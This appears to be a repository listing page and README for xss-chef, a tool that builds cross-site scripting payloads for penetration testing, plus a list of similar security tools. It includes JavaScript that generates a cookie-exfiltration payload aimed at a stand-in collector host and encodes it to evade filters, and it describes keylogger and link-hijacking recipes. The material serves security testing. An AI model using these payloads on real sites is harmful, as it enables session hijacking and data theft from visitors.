
rastating / xss-chef

Licence: GPL-3.0 License
A web application for generating custom XSS payloads

Programming Languages

javascript
184084 projects - #8 most used programming language
CSS
56736 projects
HTML
75241 projects

Projects that are alternatives of or similar to xss-chef

Cerberus
A powerful vulnerability scanner. Subdomain brute-forcing uses aioDNS with asyncio for fast asynchronous scanning, covering the target's full asset range for batch vulnerability scanning; middleware information collection; automatic collection of IP proxies, which are used while probing WAF information to protect the host's real IP, with automatic switching to a proxy IP to continue scanning once the local IP is blocked by the WAF; WAF fingerprinting (100+ domestic and foreign WAFs, including Safedog, Yunsuo, Alibaba Cloud, Yundun, Tencent Cloud, etc.) with some known WAF bypass approaches; middleware vulnerability detection (ThinkPHP, WebLogic, etc.: CVE-2018-5955, CVE-2018-12613, CVE-2018-11759, etc.); SQL injection, XSS, command execution, file inclusion and SSRF vulnerability scanning; and customisable e-mail push notification of findings.
Stars: ✭ 389 (+455.71%)
Mutual labels:  xss, penetration-testing
vulnerabilities
List of every possible vulnerability in computer security.
Stars: ✭ 14 (-80%)
Mutual labels:  xss, penetration-testing
Ezxss
ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.
Stars: ✭ 1,022 (+1360%)
Mutual labels:  xss, penetration-testing
Arachni
Web Application Security Scanner Framework
Stars: ✭ 2,942 (+4102.86%)
Mutual labels:  xss, penetration-testing
cd
CloudDefense.ai is an automated web application security testing tool that audits your web applications by checking for vulnerabilities like SQL Injection, Cross-site scripting and other exploitable vulnerabilities.
Stars: ✭ 33 (-52.86%)
Mutual labels:  xss, penetration-testing
Xsstrike
Most advanced XSS scanner.
Stars: ✭ 9,822 (+13931.43%)
Mutual labels:  xss, xss-exploit
Xssmap
XSSMap is a Python 3 tool for detecting XSS vulnerabilities
Stars: ✭ 134 (+91.43%)
Mutual labels:  xss, penetration-testing
Phpvuln
Audit tool to find common vulnerabilities in PHP source code
Stars: ✭ 146 (+108.57%)
Mutual labels:  xss, penetration-testing
Ary
Ary is an integration tool, mainly used to invoke various security tools so as to provide convenient one-click penetration testing.
Stars: ✭ 241 (+244.29%)
Mutual labels:  xss, penetration-testing
Xss Payload List
🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List
Stars: ✭ 2,617 (+3638.57%)
Mutual labels:  xss, xss-exploitation
SuperXSS
Make XSS Great Again
Stars: ✭ 57 (-18.57%)
Mutual labels:  xss, xss-exploitation
vaf
Vaf is a cross-platform very advanced and fast web fuzzer written in nim
Stars: ✭ 294 (+320%)
Mutual labels:  xss, penetration-testing
Foxss-XSS-Penetration-Testing-Tool
Foxss is a simple PHP-based penetration testing tool. Currently it helps to find XSS vulnerabilities in websites.
Stars: ✭ 35 (-50%)
Mutual labels:  xss, xss-exploitation
wasec
Examples of security features (or mishaps) on web applications -- these are mostly examples and tutorials from the WASEC book.
Stars: ✭ 74 (+5.71%)
Mutual labels:  xss
litewaf
Lightweight In-App Web Application Firewall for PHP
Stars: ✭ 32 (-54.29%)
Mutual labels:  xss
ng-dompurify
Inclusive Angular API for DOMPurify
Stars: ✭ 65 (-7.14%)
Mutual labels:  xss
cms identify
CMS identification
Stars: ✭ 13 (-81.43%)
Mutual labels:  penetration-testing
Oracle-Pentesting-Reference
Oracle Database Penetration Testing Reference (10g/11g)
Stars: ✭ 34 (-51.43%)
Mutual labels:  penetration-testing
YAPS
Yet Another PHP Shell - The most complete PHP reverse shell
Stars: ✭ 35 (-50%)
Mutual labels:  penetration-testing
persistent-clientside-xss
Exploit generator and Taint Engine to find persistent (and reflected) client-side XSS
Stars: ✭ 19 (-72.86%)
Mutual labels:  xss

XSS Chef


A web application for generating custom XSS payloads


What is XSS Chef?

XSS Chef is a small React.js application inspired by CyberChef. It gives users a modular way to build JavaScript payloads, typically used during penetration tests to demonstrate the impact of cross-site scripting vulnerabilities.

A live copy of the application can be found at https://rastating.github.io/xss-chef

What Can I Do with XSS Chef?

The current set of recipes can be found below, along with a description of what they allow you to do:

  • Alert - Display an alert in the user's browser
  • Body Replacer - Replace the inner HTML of the document body with custom markup
  • Cookie Exfiltrator - Exfiltrate one or more cookies to an external web server
  • Decimal Encoder - Encode the payload into a comma separated array of decimal numbers
  • Link Hijacker - Change the href attribute of all links on the page to point to a different URL
  • Keylogger - Log all key presses on the page and submit them back to a web server
  • String Exfiltrator - Request a resource from the target's browser and exfiltrate the data
  • WordPress: Create User - Create a new WordPress user account on the target system
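
As an added illustration of the modular idea (example code written for this page, not taken from the xss-chef repository): each recipe is a function from payload to payload, so a generator such as the cookie exfiltrator can be followed by an encoder such as the decimal encoder, the same way operations are stacked in CyberChef. The recipe names follow the list above, but the payload templates, the `cook` helper, the `decodeDecimal` checker and the collector URL `https://collector.example` are assumptions; the real application's output format may differ. During an engagement the collector must be a host you operate.

```javascript
// Added example of a recipe pipeline in the spirit of XSS Chef.
// Not code from the xss-chef repository; templates and names are assumptions.

// A recipe is a pure function: (payload, options) -> payload.
// Generators ignore their input and emit a payload; encoders transform the
// payload they receive, so they can be stacked after any generator.
const recipes = {
  // Alert - display an alert in the user's browser.
  alert: (_input, { message = 'XSS' } = {}) =>
    `alert(${JSON.stringify(message)});`,

  // Cookie Exfiltrator - send document.cookie to an external web server.
  // Only non-HttpOnly cookies are readable from script, which is exactly the
  // point such a payload demonstrates to a client.
  cookieExfiltrator: (_input, { url } = {}) =>
    `new Image().src=${JSON.stringify(url + '?c=')}+encodeURIComponent(document.cookie);`,

  // Link Hijacker - point every anchor's href at a different URL.
  linkHijacker: (_input, { url } = {}) =>
    `for(const a of document.querySelectorAll('a'))a.href=${JSON.stringify(url)};`,

  // Decimal Encoder - turn the payload into a comma-separated list of UTF-16
  // code units and wrap it so the browser decodes and evaluates it. Useful
  // when a filter strips quotes or keywords but leaves String.fromCharCode.
  decimalEncoder: (input) => {
    const codes = [];
    for (let i = 0; i < input.length; i++) codes.push(input.charCodeAt(i));
    return `eval(String.fromCharCode(${codes.join(',')}));`;
  },
};

// Apply the steps in order. The first step is normally a generator.
function cook(steps) {
  return steps.reduce((payload, [name, options = {}]) => {
    const recipe = recipes[name];
    if (!recipe) throw new Error(`unknown recipe: ${name}`);
    return recipe(payload, options);
  }, '');
}

// Check that the decimal encoder round-trips without calling eval.
function decodeDecimal(encoded) {
  const m = /^eval\(String\.fromCharCode\(([\d,]*)\)\);$/.exec(encoded);
  if (!m) throw new Error('not a decimal-encoded payload');
  return m[1] === '' ? '' : String.fromCharCode(...m[1].split(',').map(Number));
}

// Usage: a cookie exfiltrator wrapped in the decimal encoder.
const exfil = cook([
  ['cookieExfiltrator', { url: 'https://collector.example' }],
  ['decimalEncoder'],
]);
console.log(exfil);
console.log(decodeDecimal(exfil));
```

Because every recipe has the same signature, adding a new one (an application-specific payload or another encoder) is a matter of adding an entry to `recipes`; the chain itself does not change.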

How to Build

  • For a production build, run: yarn build
  • For a development build, run: yarn build-dev

Running Unit Tests

The unit tests can be run with jest: yarn jest

Want to Contribute?

If you're interested in helping to improve XSS Chef, below are some of the key things that I'd like to add at some point:

  • More recipes! - These can be application-specific (like the existing WordPress payload) or generic (like the cookie exfiltrator)
  • Better mobile support - Although there is probably little need to use the application on a mobile device, it would be good to iron out the bugs in the responsive design at low resolutions.
  • A better way to browse recipes - With the limited number of recipes currently available, the existing approach works. As more are added, a categorised list would help users navigate the available recipes.